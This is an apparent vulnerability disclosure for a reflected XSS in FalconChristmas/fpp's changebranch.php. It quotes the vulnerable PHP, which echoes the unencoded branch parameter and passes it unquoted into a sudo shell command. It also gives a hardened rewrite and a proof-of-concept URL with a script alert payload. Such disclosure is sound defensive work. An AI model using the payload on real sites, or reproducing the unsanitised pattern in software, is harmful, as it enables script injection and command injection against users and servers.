Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

A reflected XSS is possible because user-controlled content (the `branch` query parameter) is echoed back into the HTML response without sanitization or encoding in https://github.com/FalconChristmas/fpp/blob/40a636c6e38442e3674db0b85fdfc5ed8a79b823/www/changebranch.php#L25

    <?php
    // www/changebranch.php (vulnerable as reported): $branch is taken straight from the query string
    $branch = $_GET['branch'];
    $command = "sudo /opt/fpp/scripts/git_branch " . $branch . " 2>&1";

    // The unencoded value is reflected into the page, so HTML/JS in it is rendered by the browser
    echo "Command: $command\n";
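For comparison, a hardened version of that fragment, as an added example and not the FPP project's own code. It validates the branch name against an allow-list pattern (an assumed pattern, chosen for this example) and HTML-encodes anything that is reflected back, so the payload from the proof of concept is rendered as text instead of executed.

```php
<?php
// Added example (not FPP's own code): hardened form of the changebranch.php fragment.

// Assumption for this example: a branch name is restricted to these characters and length.
function valid_branch_name(string $branch): bool
{
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9._\/-]{0,127}$/', $branch) === 1;
}

// Encode for an HTML text context; ENT_QUOTES also covers attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$branch = $_GET['branch'] ?? '';

// Reject anything that is not a plausible branch name before doing any work with it.
if (!valid_branch_name($branch)) {
    http_response_code(400);
    echo "Invalid branch name: " . h($branch) . "\n";
    exit;
}

// Quote the value when it is placed in the shell command (defense in depth).
$command = "sudo /opt/fpp/scripts/git_branch " . escapeshellarg($branch) . " 2>&1";

// The reflected value is now encoded: <script> becomes &lt;script&gt; in the response.
echo "Command: " . h($command) . "\n";
```

With the proof-of-concept URL, the allow-list check rejects the request before the echo; even if the validation were skipped, `h()` would neutralize the reflected markup.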

🕵️‍♂️ Proof of Concept

Visit: http://127.0.0.1/changebranch.php?branch=%3Cscript%3Ealert(%27zer0h%27)%3C/script%3E

💥 Impact

XSS